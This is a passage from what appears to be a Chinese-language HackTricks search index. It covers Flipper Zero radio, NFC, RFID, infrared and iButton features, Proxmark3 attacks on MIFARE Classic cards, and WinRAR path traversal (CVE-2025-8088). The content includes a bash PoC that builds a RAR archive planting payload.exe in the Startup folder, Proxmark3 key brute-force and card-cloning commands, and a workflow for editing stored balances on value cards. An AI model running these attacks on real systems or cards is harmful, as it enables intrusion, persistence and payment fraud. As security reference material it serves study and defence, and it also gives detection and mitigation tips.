通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » iButton » References","id":"10369","title":"References"},"1037":{"body":"WinRAR for Windows(包括rar / unrar CLI、DLL和便携源)在提取过程中未能验证文件名。 一个包含条目的恶意RAR归档,例如: text ..\\\\..\\\\..\\\\Users\\\\victim\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\payload.exe 将最终 位于 所选输出目录之外,并位于用户的 启动 文件夹内。登录后,Windows会自动执行其中的所有内容,从而提供 持久 RCE。","breadcrumbs":"Archive Extraction Path Traversal » 真实案例 – WinRAR ≤ 7.12 (CVE-2025-8088)","id":"1037","title":"真实案例 – WinRAR ≤ 7.12 (CVE-2025-8088)"},"10370":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 使用 Flipper Zero 你可以: 监听/捕获/重放无线电频率: Sub-GHz 读取/捕获/模拟 NFC 卡: NFC 读取/捕获/模拟 125kHz 标签: 125kHz RFID 读取/捕获/发送红外信号: Infrared 读取/捕获/模拟 iButtons: iButton 用作 Bad USB 用作安全密钥 (U2F) 玩贪吃蛇 其他 Flipper Zero 资源在 https://github.com/djsime1/awesome-flipperzer tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » Flipper Zero","id":"10370","title":"Flipper Zero"},"10371":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » FZ - NFC","id":"10371","title":"FZ - NFC"},"10372":{"body":"有关RFID和NFC的信息,请查看以下页面: Pentesting RFID","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » Intro","id":"10372","title":"Intro"},"10373":{"body":"caution 除了NFC卡,Flipper Zero还支持 其他类型的高频卡 ,例如几种 Mifare Classic和Ultralight以及 NTAG 。 新的NFC卡类型将被添加到支持的卡列表中。Flipper Zero支持以下 NFC卡类型A (ISO 14443A): 银行卡(EMV) — 仅读取UID、SAK和ATQA而不保存。 未知卡 — 读取(UID、SAK、ATQA)并模拟UID。 对于 NFC卡类型B、F和V ,Flipper Zero能够读取UID而不保存。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » Supported NFC cards","id":"10373","title":"Supported NFC cards"},"10374":{"body":"Bank card (EMV) Flipper Zero只能读取银行卡的UID、SAK、ATQA和存储数据 而不保存 。 银行卡读取屏幕对于银行卡,Flipper Zero只能读取数据 而不保存和模拟 。 Unknown cards 当Flipper Zero 无法确定NFC卡的类型 时,仅能 读取和保存UID、SAK和ATQA 。 未知卡读取屏幕对于未知NFC卡,Flipper Zero只能模拟UID。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » NFC cards type A","id":"10374","title":"NFC cards type A"},"10375":{"body":"对于 NFC卡类型B、F和V ,Flipper Zero只能 读取和显示UID 而不保存。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » NFC cards types B, F, and V","id":"10375","title":"NFC cards types B, F, and V"},"10376":{"body":"有关NFC的介绍 请阅读此页面 。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » Actions","id":"10376","title":"Actions"},"10377":{"body":"Flipper Zero可以 读取NFC卡 ,但是它 不理解所有基于ISO 14443的协议 。然而,由于 UID是一个低级属性 ,您可能会发现自己处于一种情况,即 UID已经被读取,但高级数据传输协议仍然未知 。您可以使用Flipper读取、模拟和手动输入UID,以便为使用UID进行授权的原始读取器。 Reading the UID VS Reading the Data Inside 在Flipper中,读取13.56 MHz标签可以分为两个部分: 低级读取 — 仅读取UID、SAK和ATQA。Flipper尝试根据从卡片读取的数据猜测高级协议。您不能对此100%确定,因为这只是基于某些因素的假设。 高级读取 — 使用特定的高级协议从卡片的内存中读取数据。这将是读取Mifare Ultralight上的数据、从Mifare Classic读取扇区,或从PayPass/Apple Pay读取卡片的属性。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » Read","id":"10377","title":"Read"},"10378":{"body":"如果Flipper 
Zero无法从低级数据中找到卡片类型,在Extra Actions中,您可以选择Read Specific Card Type并 手动****指明您想要读取的卡片类型 。 EMV Bank Cards (PayPass, payWave, Apple Pay, Google Pay) 除了简单地读取UID,您还可以从银行卡中提取更多数据。可以 获取完整的卡号 (卡片正面的16位数字)、 有效期 ,在某些情况下甚至可以获取 持卡人姓名 以及 最近交易 的列表。 但是,您 无法通过这种方式读取CVV (卡片背面的3位数字)。此外, 银行卡受到重放攻击的保护 ,因此使用Flipper复制后再尝试模拟支付是行不通的。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » Read Specific","id":"10378","title":"Read Specific"},"10379":{"body":"https://blog.flipperzero.one/rfid/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » References","id":"10379","title":"References"},"1038":{"body":"bash # Requires rar >= 6.x\\nmkdir -p \\"evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup\\"\\ncp payload.exe \\"evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/\\"\\nrar a -ep evil.rar evil/* 选项使用: -ep – 按照给定的方式存储文件路径( 不 修剪前导 ./)。 将 evil.rar 交给受害者,并指示他们使用易受攻击的 WinRAR 版本进行解压。","breadcrumbs":"Archive Extraction Path Traversal » 制作 PoC 压缩档案 (Linux/Mac)","id":"1038","title":"制作 PoC 压缩档案 (Linux/Mac)"},"10380":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » FZ - Sub-GHz","id":"10380","title":"FZ - Sub-GHz"},"10381":{"body":"Flipper Zero 可以 接收和发送 300-928 MHz 范围内的无线电频率 ,其内置模块可以读取、保存和模拟遥控器。这些遥控器用于与门、障碍物、无线电锁、遥控开关、无线门铃、智能灯等进行交互。Flipper Zero 可以帮助您了解您的安全性是否受到威胁。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Intro","id":"10381","title":"Intro"},"10382":{"body":"Flipper Zero 具有基于   CC1101 芯片 的内置 sub-1 GHz 模块和一根无线电天线(最大范围为 50 米)。CC1101 芯片和天线均设计用于在 300-348 MHz、387-464 MHz 和 779-928 MHz 频段内工作。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Sub-GHz hardware","id":"10382","title":"Sub-GHz hardware"},"10383":{"body":"","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Actions","id":"10383","title":"Actions"},"10384":{"body":"note 如何找到遥控器使用的频率 在分析时,Flipper Zero 正在扫描频率配置中所有可用频率的信号强度 (RSSI)。Flipper Zero 显示 RSSI 值最高的频率,信号强度高于 -90 dBm 。 要确定遥控器的频率,请执行以下操作: 将遥控器放置在 Flipper Zero 左侧非常靠近的位置。 转到 主菜单 → Sub-GHz 。 选择 频率分析仪 ,然后按住您想要分析的遥控器上的按钮。 查看屏幕上的频率值。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Frequency Analyser","id":"10384","title":"Frequency Analyser"},"10385":{"body":"note 查找使用的频率信息(也是查找使用频率的另一种方法) 读取 选项 在配置的频率上监听 ,默认调制为 433.92 AM。如果在读取时 发现了某些内容 ,则 屏幕上会提供信息 。这些信息可以用于将来复制信号。 在使用读取时,可以按 左按钮 并 进行配置 。 此时它有 4 种调制方式 (AM270、AM650、FM328 和 FM476),并存储了 几个相关频率 : 您可以设置 任何您感兴趣的频率 ,但是,如果您 不确定遥控器使用的频率 ,请 将跳频设置为开启 (默认关闭),并多次按下按钮,直到 Flipper 捕获到它并提供您设置频率所需的信息。 caution 在频率之间切换需要一些时间,因此在切换时传输的信号可能会丢失。为了更好的信号接收,请设置由频率分析仪确定的固定频率。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Read","id":"10385","title":"Read"},"10386":{"body":"note 在配置的频率上窃取(并重放)信号 读取原始 选项 记录在监听频率上发送的信号 。这可以用于 窃取 信号并 重复 它。 默认情况下 读取原始也在 433.92 AM650 ,但如果通过读取选项发现您感兴趣的信号在 不同的频率/调制中,您也可以通过按左键进行修改 (在读取原始选项内)。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Read Raw","id":"10386","title":"Read Raw"},"10387":{"body":"如果您知道例如车库门使用的协议,可以 生成所有代码并通过 Flipper Zero 发送它们。 这是一个支持一般常见类型车库的示例: 
https://github.com/tobiabocchi/flipperzero-bruteforce","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Brute-Force","id":"10387","title":"Brute-Force"},"10388":{"body":"note 从配置的协议列表中添加信号 支持的协议 列表 Princeton_433 (适用于大多数静态代码系统) 433.92 静态 Nice Flo 12bit_433 433.92 静态 Nice Flo 24bit_433 433.92 静态 CAME 12bit_433 433.92 静态 CAME 24bit_433 433.92 静态 Linear_300 300.00 静态 CAME TWEE 433.92 静态 Gate TX_433 433.92 静态 DoorHan_315 315.00 动态 DoorHan_433 433.92 动态 LiftMaster_315 315.00 动态 LiftMaster_390 390.00 动态 Security+2.0_310 310.00 动态 Security+2.0_315 315.00 动态 Security+2.0_390 390.00 动态","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Add Manually","id":"10388","title":"Add Manually"},"10389":{"body":"查看 https://docs.flipperzero.one/sub-ghz/supported-vendors 中的列表","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » 支持的 Sub-GHz 供应商","id":"10389","title":"支持的 Sub-GHz 供应商"},"1039":{"body":"ESET 报告了 RomCom (Storm-0978/UNC2596) 针对 RAR 压缩文件的网络钓鱼活动,利用 CVE-2025-8088 部署定制的后门并促进勒索软件操作。","breadcrumbs":"Archive Extraction Path Traversal » 观察到的实际利用","id":"1039","title":"观察到的实际利用"},"10390":{"body":"查看 https://docs.flipperzero.one/sub-ghz/frequencies 中的列表","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » 按地区支持的频率","id":"10390","title":"按地区支持的频率"},"10391":{"body":"note 获取保存频率的 dBms","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Test","id":"10391","title":"Test"},"10392":{"body":"https://docs.flipperzero.one/sub-ghz tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Reference","id":"10392","title":"Reference"},"10393":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » FZ - Infrared","id":"10393","title":"FZ - Infrared"},"10394":{"body":"有关红外线工作原理的更多信息,请查看: Infrared","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » Intro","id":"10394","title":"Intro"},"10395":{"body":"Flipper使用数字IR信号接收器TSOP,这 允许拦截来自IR遥控器的信号 。有一些 智能手机 如小米,也有IR端口,但请记住, 大多数只能发送 信号, 无法接收 信号。 Flipper的红外线 接收器相当敏感 。您甚至可以在 遥控器和电视之间的某个地方 捕捉到信号。将遥控器直接指向Flipper的IR端口并不是必要的。这在某人站在电视附近切换频道时非常方便,而您和Flipper都在一定距离之外。 由于 红外线信号的解码 发生在 软件 端,Flipper Zero潜在地支持 接收和发送任何IR遥控代码 。在无法识别的 未知 协议的情况下,它 记录并回放 接收到的原始信号。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » IR Signal Receiver in Flipper Zero","id":"10395","title":"IR Signal Receiver in Flipper Zero"},"10396":{"body":"","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » Actions","id":"10396","title":"Actions"},"10397":{"body":"Flipper Zero可以用作 通用遥控器来控制任何电视、空调或媒体中心 。在此模式下,Flipper会 暴力破解 所有支持制造商的 已知代码 , 根据SD卡中的字典 。您无需选择特定的遥控器来关闭餐厅的电视。 只需在通用遥控模式下按下电源按钮,Flipper将**依次发送所有已知电视的“关机”**命令:索尼、三星、松下……等等。当电视接收到信号时,它将做出反应并关闭。 这种暴力破解需要时间。字典越大,完成所需的时间就越长。无法确定电视确切识别了哪个信号,因为电视没有反馈。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » Universal Remotes","id":"10397","title":"Universal Remotes"},"10398":{"body":"可以使用Flipper Zero 捕获红外信号 。如果它 在数据库中找到信号 ,Flipper将自动 知道这是哪个设备 并允许您与之交互。 如果没有,Flipper可以 存储 该 信号 并允许您 重播 它。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » Learn New 
Remote","id":"10398","title":"Learn New Remote"},"10399":{"body":"https://blog.flipperzero.one/infrared/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Infrared » References","id":"10399","title":"References"},"104":{"body":"一旦你发现了所有想要深入扫描的 IP(外部或内部),可以执行不同的操作。","breadcrumbs":"Pentesting Network » 扫描主机","id":"104","title":"扫描主机"},"1040":{"body":"静态检查 – 列出归档条目,并标记任何包含 ../、..\\\\\\\\、 绝对路径 (C:) 或非规范 UTF-8/UTF-16 编码的名称。 沙箱提取 – 使用 安全 提取器(例如,Python 的 patool、7-Zip ≥ 最新版、bsdtar)解压到一次性目录,并验证结果路径保持在该目录内。 端点监控 – 在 WinRAR/7-Zip 等打开归档后,警报新可执行文件写入 Startup/Run 位置。","breadcrumbs":"Archive Extraction Path Traversal » 检测提示","id":"1040","title":"检测提示"},"10400":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » FZ - iButton","id":"10400","title":"FZ - iButton"},"10401":{"body":"有关 iButton 的更多信息,请查看: iButton","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Intro","id":"10401","title":"Intro"},"10402":{"body":"下图的 蓝色 部分是您需要 放置真实 iButton 的位置,以便 Flipper 可以 读取它。 绿色 部分是您需要 用 Flipper zero 接触读卡器 以 正确模拟 iButton 的方式。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Design","id":"10402","title":"Design"},"10403":{"body":"","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Actions","id":"10403","title":"Actions"},"10404":{"body":"在读取模式下,Flipper 正在等待 iButton 密钥接触,并能够处理三种类型的密钥: Dallas, Cyfral, 和 Metakom 。Flipper 将 自动识别密钥类型 。密钥协议的名称将显示在 ID 号码上方的屏幕上。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Read","id":"10404","title":"Read"},"10405":{"body":"可以 手动添加 类型为: Dallas, Cyfral, 和 Metakom 的 iButton。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Add manually","id":"10405","title":"Add manually"},"10406":{"body":"可以 模拟 已保存的 iButtons(读取或手动添加)。 tip 如果您无法使 Flipper Zero 的预期接触点接触读卡器,您可以 使用外部 GPIO:","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » Emulate","id":"10406","title":"Emulate"},"10407":{"body":"https://blog.flipperzero.one/taming-ibutton/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - iButton » References","id":"10407","title":"References"},"10408":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » FZ - 125kHz RFID","id":"10408","title":"FZ - 125kHz RFID"},"10409":{"body":"有关125kHz标签工作原理的更多信息,请查看: Pentesting RFID","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » Intro","id":"10409","title":"Intro"},"1041":{"body":"更新提取器 – WinRAR 7.13 实现了适当的路径清理。用户必须手动下载,因为 WinRAR 缺乏自动更新机制。 尽可能使用 “忽略路径” 选项提取归档(WinRAR: 提取 → \\"不提取路径\\" )。 在 沙箱 或虚拟机中打开不受信任的归档。 实施应用程序白名单,并限制用户对自动运行目录的写入访问。","breadcrumbs":"Archive Extraction Path Traversal » 缓解与加固","id":"1041","title":"缓解与加固"},"10410":{"body":"有关这些类型标签的更多信息 请阅读此介绍 。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » Actions","id":"10410","title":"Actions"},"10411":{"body":"尝试 读取 卡片信息。然后可以 模拟 它们。 warning 请注意,一些对讲机试图通过在读取之前发送写入命令来保护自己免受密钥复制。如果写入成功,则该标签被视为假标签。当Flipper模拟RFID时,读卡器无法将其与原始标签区分开,因此不会出现此类问题。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » Read","id":"10411","title":"Read"},"10412":{"body":"您可以在Flipper Zero中创建 指示您手动输入数据的假卡 ,然后模拟它。 IDs on cards 有时,当您获得一张卡时,您会发现卡片上可见的ID(或部分ID)。 EM Marin 例如,在这张EM-Marin卡中,物理卡上可以 清晰地读取最后3个字节中的5个字节 。 如果您无法从卡片上读取其他2个字节,可以通过暴力破解来获取。 HID 在这张HID卡中也是如此,只有3个字节中的2个可以在卡片上找到。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » Add Manually","id":"10412","title":"Add Manually"},"10413":{"body":"在 复制 一张卡或 手动输入 ID后,可以使用Flipper Zero 模拟 它或 写入 到真实卡片中。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » 
Emulate/Write","id":"10413","title":"Emulate/Write"},"10414":{"body":"https://blog.flipperzero.one/rfid/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - 125kHz RFID » References","id":"10414","title":"References"},"10415":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Proxmark 3 » Proxmark 3","id":"10415","title":"Proxmark 3"},"10416":{"body":"The first thing you need to do is to have a Proxmark3 and install the software and it\'s dependencie s .","breadcrumbs":"Radio Hacking » Proxmark 3 » 使用 Proxmark3 攻击 RFID 系统","id":"10416","title":"使用 Proxmark3 攻击 RFID 系统"},"10417":{"body":"它有 16 sectors ,每个有 4 blocks ,每个 block 包含 16B 。UID 位于 sector 0 block 0(且不能被更改)。 要访问每个 sector 你需要 2 keys ( A 和 B ),它们存储在 block 3 of each sector (sector trailer)。sector trailer 还存储 access bits ,这些位决定了使用这两个 keys 对 each block 的 read and write 权限。 2 keys 可用于例如:如果你知道第一个则可以赋予读取权限,如果你知道第二个则可以赋予写入权限(例如)。 Several attacks can be performed bash proxmark3> hf mf #List attacks proxmark3> hf mf chk *1 ? 
t ./client/default_keys.dic #Keys bruteforce\\nproxmark3> hf mf fchk 1 t # Improved keys BF proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key\\nproxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)\\nproxmark3> hf mf restore # Copy data to a new card\\nproxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump\\nproxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1\\nproxmark3> hf mf eget 01 # Read block 1\\nproxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card The Proxmark3 allows to perform other actions like eavesdropping a Tag to Reader communication to try to find sensitive data. In this card you could just sniff the communication with and calculate the used key because the cryptographic operations used are weak and knowing the plain and cipher text you can calculate it (mfkey64 tool). 
MiFare Classic quick workflow for stored-value abuse 当终端在 Classic 卡上存储余额时,典型的端到端流程是: bash # 1) Recover sector keys and dump full card\\nproxmark3> hf mf autopwn # 2) Modify dump offline (adjust balance + integrity bytes)\\n# Use diffing of before/after top-up dumps to locate fields # 3) Write modified dump to a UID-changeable (\\"Chinese magic\\") tag\\nproxmark3> hf mf cload -f modified.bin # 4) Clone original UID so readers recognize the card\\nproxmark3> hf mf csetuid -u 注意 hf mf autopwn 协调 nested/darkside/HardNested-style 攻击,恢复密钥,并在 client dumps 文件夹中创建 dumps。 写入 block 0/UID 仅适用于 magic gen1a/gen2 cards。普通 Classic cards 的 UID 为只读。 许多部署使用 Classic \\"value blocks\\" 或简单的 checksums。编辑后请确保所有 duplicated/complemented fields 和 checksums 保持一致。 参见更高层次的方法论和缓解措施: Pentesting RFID","breadcrumbs":"Radio Hacking » Proxmark 3 » 针对 MIFARE Classic 1KB 的攻击","id":"10417","title":"针对 MIFARE Classic 1KB 的攻击"},"10418":{"body":"IoT 系统有时使用 nonbranded or noncommercial tags 。在这种情况下,你可以使用 Proxmark3 向它们发送自定义 raw commands to the tags 。 bash proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04\\nSAK : 08 [2]\\nTYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1\\nproprietary non iso14443-4 card found, RATS not supported\\nNo chinese magic backdoor command detected\\nPrng detection: WEAK\\nValid ISO14443A Tag Found - Quiting Search 有了这些信息,你可以尝试搜索有关该卡以及与其通信方式的信息。Proxmark3 允许发送原始命令,例如:hf 14a raw -p -b 7 26","breadcrumbs":"Radio Hacking » Proxmark 3 » 原始命令","id":"10418","title":"原始命令"},"10419":{"body":"Proxmark3 软件附带了预加载的 自动化脚本 列表,可用于执行简单任务。要检索完整列表,请使用 script list 命令。接着使用 script run 命令,后面跟上脚本名称: proxmark3> script run mfkeys 你可以创建一个脚本来 fuzz tag readers ,在复制一个 valid card 的数据时,只需编写一个 Lua script 对一个或多个随机 bytes 进行 randomize ,并检查在任意一次迭代中是否会 reader crashes 。","breadcrumbs":"Radio Hacking » Proxmark 3 » 脚本","id":"10419","title":"脚本"},"1042":{"body":"2018 – Snyk 发布的大规模 Zip-Slip 通告,影响许多 Java/Go/JS 库。 2023 – 7-Zip CVE-2023-4011 在 -ao 合并期间类似的遍历。 任何未能在写入之前调用 PathCanonicalize / realpath 的自定义提取逻辑。","breadcrumbs":"Archive 
Extraction Path Traversal » 其他受影响/历史案例","id":"1042","title":"其他受影响/历史案例"},"10420":{"body":"Proxmark3 wiki: HF MIFARE Proxmark3 wiki: HF Magic cards NXP statement on MIFARE Classic Crypto1 NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Proxmark 3 » 参考资料","id":"10420","title":"参考资料"},"10421":{"body":"Reading time: 12 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
